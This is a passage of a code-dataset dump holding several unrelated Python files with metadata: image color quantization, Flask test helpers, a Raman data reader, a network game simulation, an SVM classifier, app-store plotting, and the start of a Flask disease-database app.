"call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "616276164", "text": "from PIL import Image\r\n\r\ncolorTable = []\r\ncolorLUT = []\r\n\r\n# 获取原图像的所有颜色\r\ndef getColorTable(image):\r\n width = image.width\r\n height = image.height\r\n for x in range(width):\r\n for y in range(height):\r\n r, g, b = image.getpixel((x, y))\r\n cube = (r,g,b)\r\n colorTable.append(cube)\r\n\r\n# 根据r, g, b的排序函数\r\ndef sortByR(cube):\r\n return cube[0]\r\n\r\ndef sortByG(cube):\r\n return cube[1]\r\n\r\ndef sortByB(cube):\r\n return cube[2]\r\n\r\n# 中位切分算法\r\ndef medianCut(slice, times):\r\n length = len(slice)\r\n if times >= 8:\r\n rSum = 0\r\n gSum = 0\r\n bSum = 0\r\n for i in range(length):\r\n rSum += slice[i][0]\r\n gSum += slice[i][1]\r\n bSum += slice[i][2]\r\n newCube = (rSum / length, gSum / length, bSum / length)\r\n colorLUT.append(newCube)\r\n return\r\n if times % 3 == 0:\r\n slice.sort(key=sortByR)\r\n elif times % 3 == 1:\r\n slice.sort(key=sortByG)\r\n else:\r\n slice.sort(key=sortByB)\r\n medianCut(slice[:length//2], times+1)\r\n medianCut(slice[length//2:], times+1)\r\n\r\n# 计算距离\r\ndef getDis(cube1, cube2):\r\n r = cube1[0] - cube2[0]\r\n g = cube1[1] - cube2[1]\r\n b = cube1[2] - cube2[2]\r\n return r*r + g*g + b*b\r\n\r\n# 获取最短欧式距离的颜色\r\ndef getNewColor(cube):\r\n length = len(colorLUT)\r\n index = 0\r\n dis = getDis(cube, colorLUT[0])\r\n for i in range(length):\r\n newDis = getDis(cube, colorLUT[i])\r\n if newDis < dis:\r\n index = i\r\n dis = newDis\r\n return colorLUT[index]\r\n\r\n# 生成新的8位彩色图像\r\ndef toNewImage(image):\r\n width = image.width\r\n height = image.height\r\n img = Image.new(\"RGB\", (width, height))\r\n for x in range(width):\r\n for y in range(height):\r\n r, g, b = image.getpixel((x, y))\r\n cube = (r,g,b)\r\n colorCube = getNewColor(cube)\r\n img.putpixel((x, y), (int(colorCube[0]), int(colorCube[1]), int(colorCube[2])))\r\n return img\r\n\r\ndef main():\r\n times = 0\r\n img = Image.open(\"redapple.jpg\")\r\n getColorTable(img)\r\n medianCut(colorTable, times)\r\n resImage = toNewImage(img)\r\n resImage.save(\"p2resImg.jpg\", \"JPEG\")\r\n\r\nmain()\r\n", "sub_path": "Multimedia/Homework/Hw1/陈亚楠+16340041+作业1/实验代码/Problem2.py", "file_name": "Problem2.py", "file_ext": "py", "file_size_in_byte": 2280, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.new", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "629708919", "text": "from bs4 import BeautifulSoup\nfrom lbrc_flask.database import db\n\n\ndef login(client, faker):\n s = faker.site_details()\n u = faker.user_details()\n u.site = s\n db.session.add(s)\n db.session.add(u)\n db.session.commit()\n\n resp = client.get(\"/login\")\n soup = BeautifulSoup(resp.data, \"html.parser\")\n\n crf_token = soup.find(\n \"input\", {\"name\": \"csrf_token\"}, type=\"hidden\", id=\"csrf_token\"\n )\n\n data = dict(email=u.email, password=u.password)\n\n if crf_token:\n data[\"csrf_token\"] = crf_token.get(\"value\")\n\n client.post(\"/login\", data=data, follow_redirects=True)\n\n return u\n\n\ndef add_content_for_all_areas(faker, user):\n study = faker.study_details()\n study.owners.append(user)\n study.collaborators.append(user)\n\n db.session.add(study)\n\n upload = faker.upload_details()\n upload.completed = False\n upload.study = study\n upload.uploader = user\n\n db.session.add(upload)\n\n db.session.commit()\n\n return (study, upload)\n", "sub_path": "tests/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "lbrc_flask.database.db.session.add", "line_number": 9, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 9, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 10, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 10, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 10, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.commit", "line_number": 11, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 11, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 11, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 35, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 35, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 42, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 42, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 42, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.commit", "line_number": 44, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "219286105", "text": "import pandas as pd\nfrom scipy.signal import detrend\n\n\ndef reader_single_point(filename, normalize=False, remove_offset=False):\n \"\"\"\n Reader for raman spectrometry files of a single location.\n\n Parameters\n ----------\n filename: str\n with 
filename\n    normalize: bool\n        Normalize to maximum (max of the counts will be 1)\n\n    remove_offset: bool\n        Remove linear offset using detrend from scipy. Mostly for visualization\n\n    Returns\n    -------------\n    data: pandas dataframe with two columns: wavenumber and intensity\n    header: metadata from the measurement\n    \"\"\"\n    data = pd.read_csv(filename, comment='#', sep='\\t', index_col=False, names=['wavenumber', 'intensity'])\n    if normalize:\n        min = data.intensity.min()\n        max = data.intensity.max()\n        data.intensity = data.intensity.apply(lambda x: ((x - min) / (max - min)))\n\n    if remove_offset:\n        data.intensity = detrend(data.intensity, type='linear')\n\n    return data\n", "sub_path": "ramanpy/read_experiment.py", "file_name": "read_experiment.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.signal.detrend", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "507332476", "text": "# coding = utf-8\r\nimport networkx as ne # import the network-modeling package and alias it as ne\r\nimport numpy as np\r\nfrom random import choice\r\nimport math\r\nimport uuid\r\n#from savegraph2mssql import Savegraph2SQLServer\r\nfrom PGG_base import PGGBase\r\nimport matplotlib.pyplot as plt\r\n\r\n#PoissonCDF = [0.0000, 0.0005, 0.0076, 0.0458, 0.1550, 0.3472, 0.5760, 0.7720, 0.8987, 0.9626, 0.9884]\r\n#PoissonCDF = [0.0000, 0.0404, 0.1246, 0.2650, 0.4404, 0.6159, 0.7621, 0.8666, 0.9319, 0.9681, 0.9863,0.9945,0.9979,0.9993,0.9997,0.99993,0.99998,0.99999,0.99999,0.99999,0.99999]\r\nT_value = 40\r\nPoissonCDF = [0.000000000,\r\n              0.000499399,\r\n              0.002769396,\r\n              0.010336051,\r\n              0.029252688,\r\n              0.067085963,\r\n              0.130141421,\r\n              0.220220647,\r\n              0.332819679,\r\n              0.457929714,\r\n              0.583039750,\r\n              0.696776146,\r\n              0.791556476,\r\n              0.864464423,\r\n              0.916541527,\r\n              0.951259597,\r\n              0.972958390,\r\n              0.985722386,\r\n              0.992813495,\r\n              0.996545658,\r\n              0.998411739,\r\n              0.999300349,\r\n              0.999704263,\r\n              0.999704263,\r\n              0.999953050,\r\n              0.999982319,\r\n              0.999993577,\r\n              0.999997746,\r\n              0.999999235,\r\n              0.999999749,\r\n              0.999999920,\r\n              0.999999975,\r\n              0.999999992,\r\n              0.999999997,\r\n              0.999999999,\r\n              1,\r\n              1,\r\n              1,\r\n              1,\r\n              1,\r\n              1]\r\n\r\n\r\n\r\n\r\nclass PGG_Edge_Breaking_Rule(PGGBase):\r\n\r\n    def edges_evolve(self):\r\n        #edge_remove_list = []\r\n\r\n        for u, v in self.g.edges:\r\n            d_times0 = int(self.g[u][v]['Satisfaction'][0])\r\n            if d_times0 > T_value:\r\n                d_times0 = T_value\r\n            if d_times0 < 0:\r\n                d_times0 = 0\r\n            d_times1 = int(self.g[u][v]['Satisfaction'][1])\r\n            if d_times1 > T_value:\r\n                d_times1 = T_value\r\n            if d_times1 < 0:\r\n                d_times1 = 0\r\n            p_remove_edge0 = PoissonCDF[d_times0]\r\n            p_remove_edge1 = PoissonCDF[d_times1]\r\n
\r\n            if p_remove_edge0 > np.random.random() or p_remove_edge1 > np.random.random():\r\n\r\n                self.g.remove_edge(u,v)\r\n                if self.g.nodes[u]['Strategy'] == 'C':\r\n                    oldnode = u\r\n                else:\r\n                    oldnode = v\r\n\r\n                newnodes = []\r\n                \r\n                surroundings = 0\r\n                surrounding = 0\r\n                for neighbor in self.g.neighbors(oldnode):\r\n                    if self.g.nodes[oldnode]['id'] > self.g.nodes[neighbor]['id']:\r\n                        surroundings = surroundings + self.g[oldnode][neighbor]['Satisfaction'][0]\r\n                    else:\r\n                        surroundings = surroundings + self.g[oldnode][neighbor]['Satisfaction'][1]\r\n\r\n                if self.g.degree[oldnode] != 0:\r\n                    surrounding = surroundings/self.g.degree[oldnode]\r\n\r\n                part_choice = (1 / (1 + np.exp(-surrounding)))\r\n                #part_choice = surrounding/20\r\n                #like = -5 and unlike = 5 and r = 2.9\r\n                if np.random.random() > part_choice and surroundings < 0 and self.g.degree[oldnode] != 0:\r\n                    \r\n                    for neighbor in self.g.neighbors(oldnode):\r\n                        if self.g.nodes[oldnode]['id'] > self.g.nodes[neighbor]['id']:\r\n                            key = self.g[oldnode][neighbor]['Satisfaction'][0]\r\n                        else:\r\n                            key = surroundings + self.g[oldnode][neighbor]['Satisfaction'][1]\r\n\r\n                        for k_nei in self.g.neighbors(neighbor):\r\n                            if self.g.has_edge(oldnode,k_nei) == False:\r\n                                newnodes.append(k_nei)\r\n                    if newnodes != []:\r\n                        newnode = choice(newnodes)\r\n                    #if len(newnodes) != 0:\r\n                        #print('internal selection')\r\n                    if newnodes == []:\r\n                        \r\n                        for j in self.g.nodes:\r\n                            if (self.g.nodes[j]['id'] != self.g.nodes[u]) and (\r\n                                    self.g.nodes[j]['id'] != self.g.nodes[v]) and self.g.has_edge(oldnode,j) == False:\r\n                                newnodes.append(j)\r\n                        newnode = choice(newnodes)\r\n\r\n                    #newnode = choice(newnodes)\r\n\r\n                    self.g.add_edge(newnode, oldnode)\r\n\r\n                    self.g[oldnode][newnode]['id'] = str(uuid.uuid1())\r\n                    self.g[oldnode][newnode]['Satisfaction'] = [0,0]\r\n                    self.g[oldnode][newnode]['Weight'] = 0\r\n                    self.g[oldnode][newnode]['income_i_o'] = 0\r\n                    self.g[oldnode][newnode]['income_i_p'] = 0\r\n                    self.g[oldnode][newnode]['income_j_o'] = 0\r\n                    self.g[oldnode][newnode]['income_j_p'] = 0\r\n                    #edge_remove_list.append(edge_remove)\r\n        #self.g.remove_edges_from(edge_remove_list)\r\n        '''\r\n        for i in edge_remove_list:\r\n            if np.random.random() > 0:\r\n                #print('fc',fc)\r\n                newnodes = []\r\n                for j in self.g.nodes:\r\n                    if (self.g.nodes[j]['id'] != self.g.nodes[i[0]]) and (self.g.nodes[j]['id'] != self.g.nodes[i[1]]):\r\n                        newnodes.append(j)\r\n                newnode = choice(newnodes)\r\n                if self.g.nodes[i[0]]['Strategy'] == 'C':\r\n                    oldnode = i[0]\r\n                    self.g.add_edge(newnode,i[0])\r\n                else:\r\n                    self.g.add_edge(newnode, i[1])\r\n                    oldnode = i[1]\r\n\r\n                self.g[oldnode][newnode]['id'] = str(uuid.uuid1())\r\n                self.g[oldnode][newnode]['Weight'] = 0\r\n                self.g[oldnode][newnode]['type'] = 'N'\r\n                self.g[oldnode][newnode]['income_i_o'] = 0\r\n                self.g[oldnode][newnode]['income_i_p'] = 0\r\n                self.g[oldnode][newnode]['income_j_o'] = 0\r\n                self.g[oldnode][newnode]['income_j_p'] = 0\r\n        '''\r\n\r\n\r\n    def break_game(self, CCount):\r\n        return self.g.number_of_edges()==0 or CCount == self.g.number_of_nodes()\r\n\r\n    #def save_graph_stat_info(self, game_times, CCount):\r\n        #self.msg.SaveGraphMDe(game_times, CCount)\r\n\r\n\r\ndef main():\r\n    repeat_times = 10\r\n\r\n    p0 = 0.55\r\n    k = 0.1\r\n    game_times = 1000 \r\n    node_num = 1000\r\n    '''\r\n    r = 1.0\r\n    while r < 8.01:\r\n        i = 0\r\n        while i < repeat_times:\r\n            ge = NxPGG_Edge_Rule1('regular_graph', node_num, p0, 4, True)\r\n            ge.game(r=r, k=k, game_times=game_times)\r\n            i += 1\r\n        r += 1.0\r\n    '''\r\n    r = 2\r\n    while r < 2.001:\r\n        print('r:',r)\r\n        i = 0\r\n        while i < repeat_times:\r\n            ge = PGG_Edge_Breaking_Rule('regular_graph', node_num, p0, 4, True)\r\n            ge.game(r=r, k=k, game_times=game_times)\r\n            i += 1\r\n        r += 0.1\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n", "sub_path": "PGG_breaking.py", "file_name": "PGG_breaking.py", "file_ext": "py", "file_size_in_byte": 7299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PGG_base.PGGBase", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 99, "usage_type": 
"call"}, {"api_name": "numpy.random.random", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "335737121", "text": "# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n# Get file names \n\npath = os.getcwd()\n\nfolders = []\n\n# r=root, d=directories, f = files\nfor r, d, f in os.walk(path):\n for folder in d:\n print(folder)\n folders.append(os.path.join(r, folder))\n\nfor f in folders:\n print(f)\n\n# Load in all files\n\nds_move = []\nds_var = [];\nds_std = [];\nds_slp = [];\nds_mean = []\n\nfor x in range(len(folders)):\n temp = os.listdir(folders[x])\n os.chdir(folders[x])\n #print(\"Temp is changing folders to \", temp)\n for c in range(len(os.listdir(folders[x]))):\n #if not c.strip(): continue # skip the empty line\n print(x);\n dataset = pd.read_csv(temp[c], sep=\",\", header=None);\n dataset.columns = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\n dataset = dataset.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n ds_move.append(x);\n ds_mean.append((dataset.mean()/10000).tolist());\n ds_var.append(dataset.var().tolist());\n ds_std.append(dataset.std().tolist());\n ds_slp.append(dataset.apply(lambda x: np.polyfit(dataset.index, x, 1)[0]).tolist());\n \n \n\n# separate the 2\n# =============================================================================\n# print(\"---------------------------------------\") \n# means.append(ds_mean)\n# var.append(ds_var)\n# std.append(ds_std)\n# slp.append(ds_slp)\n# ds_var = []\n# ds_slp = []\n# ds_std = []\n# ds_mean = [] \n# =============================================================================\n\n#visulizing slopes\n# =============================================================================\n# \n# for i in dataset.columns:\n# plt.scatter(dataset.index, dataset[i], label=i)\n# plt.plot(np.polyval(np.polyfit(dataset.index, dataset[i], 1), dataset.index))\n# \n# plt.legend()\n# plt.show()\n# \n# \n# # Visualize\n# plt.figure(12)\n# plt.plot(dataset.acc_x)\n# \n# plt.plot(dataset.acc_y)\n# \n# plt.plot(dataset.acc_z)\n# \n# =============================================================================\n\n\ntest_1 = ds_mean[10]\ntest_2 = ds_mean[2000]\ntest_3 = ds_mean[1000]\ntests = [test_1, test_2, test_3]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(ds_mean, ds_move, test_size = 0.25)\n\n#X_train/10000\n#X_test/10000\n#print(X_train[:10], \"\\n\", X_test[:10])\n# Feature Scaling\n#from sklearn.preprocessing import StandardScaler\n#sc = StandardScaler()\n#X_train = sc.fit_transform(X_train)\n#X_test = sc.transform(X_test)\n\n\n# Fitting SVM to the Training set\nfrom sklearn.svm import SVC\nclassifier = SVC(probability=True)\nclassifier.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix, accuracy_score\ncm = confusion_matrix(y_test, y_pred)\nacc = accuracy_score(y_test, y_pred)\n\n\n#Test\ndata = pd.read_csv(\"data_3.txt\", sep=\",\", header=None);\ndata.columns = [\"acc_x\", 
\"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\ndata = data.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n\ndata_mean = []\ndata_mean.append((data.mean()/10000).tolist());\n\ndata_pred = classifier.predict_proba(data_mean)\nplt.figure(13)\nplt.plot(data.acc_x)\n \nplt.plot(data.acc_y)\n \nplt.plot(data.acc_z)\n\ndata = pd.read_csv(\"4.txt\", sep=\",\", header=None);\ndata.columns = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\ndata = data.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n\nplt.figure(2)\nplt.plot(data.acc_x)\n \nplt.plot(data.acc_y)\n \nplt.plot(data.acc_z)\n", "sub_path": "Machine Learning/ML_movement.py", "file_name": "ML_movement.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "326791068", "text": "import os\nimport csv\nimport pandas\nimport matplotlib.pyplot as plt\nimport functools \nimport random\nf = ['googleplaystore.csv', 'googleplaystore_user_reviews.csv']\n\ndef Q():\n name = 
[]\n flag = 0\n csvfile = open(f[0], 'r', encoding='utf-8')\n T = []\n for row in csv.reader(csvfile, delimiter=','): \n T.append(row)\n \n return T\n \nos.chdir('G:\\\\VM_SYNC\\\\JYT-ML\\\\HW1')\n\ndata = pandas.read_csv('googleplaystore.csv')\n\ndf = pandas.DataFrame(data)\n\n\n#['App', 'Category', 'Rating', 'Reviews', 'Size', 'Installs', 'Type', 'Price', 'Content Rating', 'Genres', 'Last Updated', 'Current Ver','Android Ver']\n\n\n#清除上一次產生的圖片\n\nfor index in [1,2,3,4,5]:\n try:\n os.remove(df.columns[index]+'.png')\n except:\n pass\n\n# --------------------\n# Category.png\n# --------------------\n\nFig1 = df[['Category',df.columns[0]]].groupby('Category').count()\nFig1.plot.bar(figsize=(20,15))\nplt.savefig('Category'+'.png')\n\n# --------------------\n# Rating.png\n# --------------------\n\nFig2 = df[[ 'Rating',df.columns[0]]].groupby( 'Rating').count()\nFig2.plot.bar(figsize=(20,15))\nplt.savefig( 'Rating'+'.png')\n\n# --------------------\n# Installs.png\n# --------------------\n\ndef cmp(a,b):\n if a=='Free':\n return -1\n if b=='Free':\n return 1\n if len(a) < len(b):\n return -1\n return 1\n\nFig5 = df[['Installs',df.columns[0]]].groupby('Installs').count()\nX = Fig5.index.tolist()\nY = Fig5['App'].tolist()\nD = dict( zip(X,Y) )\nX.sort(key=functools.cmp_to_key(cmp))\nE = []\nF = []\nfor a in X:\n E.append(a)\n F.append(D.get(a))\nFig5 = pandas.DataFrame(F,index=E)\nFig5.plot.bar(figsize=(20,15))\nplt.savefig('Installs'+'.png')\n\n# --------------------\n# Reviews.png\n# --------------------\n\nplt.cla()\nFig3 = df['Reviews'].tolist()\nFig3 = [int(x.replace('M','000000').replace('K','000').replace('.','')) for x in Fig3]\nA = [ x for x in range(0,len(Fig3)) ] \nrandom.shuffle(A)\nplt.scatter(A ,Fig3)\nplt.savefig('Reviews'+'.png')\n\n# --------------------\n# Size.png\n# --------------------\nFig4 = df['Size'].tolist()\n\ninterval = ['0','1','5','10', '20','40', '100',]\ncounter = {'0~1M':0,'1M+':0,'5M+':0,'10M+':0,'20M+':0,'40M+':0,'100M+':0, 'Varies with device':0}\nfor x in Fig4:\n if x == 'Varies with device':\n counter['Varies with device'] += 1\n continue\n sc = 0\n if x[-1] == 'M':\n sc = float(x.replace('M',''))*1000\n elif x[-1] == 'B':\n sc = float(x.replace('K',''))*1\n \n if sc <= 1000:\n counter['0~1M']+=1\n elif sc < 5000:\n counter['1M+']+=1\n elif sc < 10000:\n counter['5M+']+=1\n elif sc < 20000:\n counter['10M+']+=1\n elif sc < 40000:\n counter['20M+']+=1\n elif sc < 100000:\n counter['40M+']+=1\n else:\n counter['100M+']+=1\n \n #print(x,sc)\nE = []\nF = []\nfor x in counter.keys():\n E.append(x)\n F.append(counter.get(x))\nFig4 = pandas.DataFrame(F,index=E)\nFig4.plot.bar(figsize=(20,15))\nplt.savefig('Size'+'.png')\n\n'''\nreply = df[['App', df.columns[2]]].groupby('App').count()\nreply1 = df['App'].value_counts()\n#框出兩欄資料 然後groupby app name 另外一欄只是用來計算數量用的\n\n#這樣就可以有每個APP的留言數量了\n\nplt.style.use('classic')\n#reply.plot.box()\nreply1.plot()\nplt.show()\n'''\n\nplt.close('all')", "sub_path": "HW1/stat/Genstatpic.py", "file_name": "Genstatpic.py", "file_ext": "py", "file_size_in_byte": 3313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.reader", "line_number": 14, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 33, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.savefig", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "functools.cmp_to_key", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}]} +{"seq_id": "279282562", "text": "from django_comments_xtd.models import XtdComment\nfrom rest_framework import serializers\n\n\nclass CommentSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = XtdComment\n fields = (\n 'user', 'user_name', 'user_email',\n 'comment', 'submit_date',\n 'thread_id', 'parent_id', 'level', 'order', 'followup'\n )\n", "sub_path": "data_commons/serializers/comments.py", "file_name": "comments.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "django_comments_xtd.models.XtdComment", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "352158336", "text": "import settings as setts\nfrom tools.models import MLModel\n\n# Setting ML model\nml_model = MLModel(setts.ml_model, settings=setts)\n\n# Training if needed and get predictions\njson_result = ml_model.generate_prediction_from_values(input_registered=[32, 60],\n input_month=[1, 5],\n input_hour=[1, 2],\n input_weekday=[6, 3])\n", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tools.models.MLModel", "line_number": 5, "usage_type": "call"}, {"api_name": "settings.ml_model", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "109004102", "text": "from flask import Flask, request, render_template, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///rare_disease.db'\r\ndb = SQLAlchemy(app)\r\n\r\n### Models for database tables\r\nclass Disease(db.Model):\r\n id = 
db.Column(db.Integer, primary_key=True)\r\n disease_name = db.Column(db.String(120), unique=True)\r\n disease_desc = db.Column(db.Text)\r\n disease_desc_new = db.Column(db.Text)\r\n disease_desc_old = db.Column(db.Text)\r\n disease_links = db.Column(db.Text)\r\n def __init__(self,disease_name):\r\n self.disease_name = disease_name\r\n def __rept__(self):\r\n return '' % self.disease_name\r\n\r\nclass Therapist(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n therapist_name = db.Column(db.String(120), unique=True)\r\n therapy_desc = db.Column(db.Text)\r\n cost_per_session = db.Column(db.Float(6,2))\r\n def __init__(self,therapist_name):\r\n self.therapist_name = therapist_name\r\n def __rept__(self):\r\n return '' % self.therapist_name\r\n\r\nclass Medicine(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n medicine_name = db.Column(db.String(120), unique=True)\r\n medicine_desc = db.Column(db.Text)\r\n cost_per_unit = db.Column(db.Float(6,2))\r\n def __init__(self,medicine_name):\r\n self.medicine_name = medicine_name\r\n def __rept__(self):\r\n return '' % self.medicine_name\r\n\r\nclass Location(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n location_name = db.Column(db.String(120), unique=True)\r\n therapy_cost_factor = 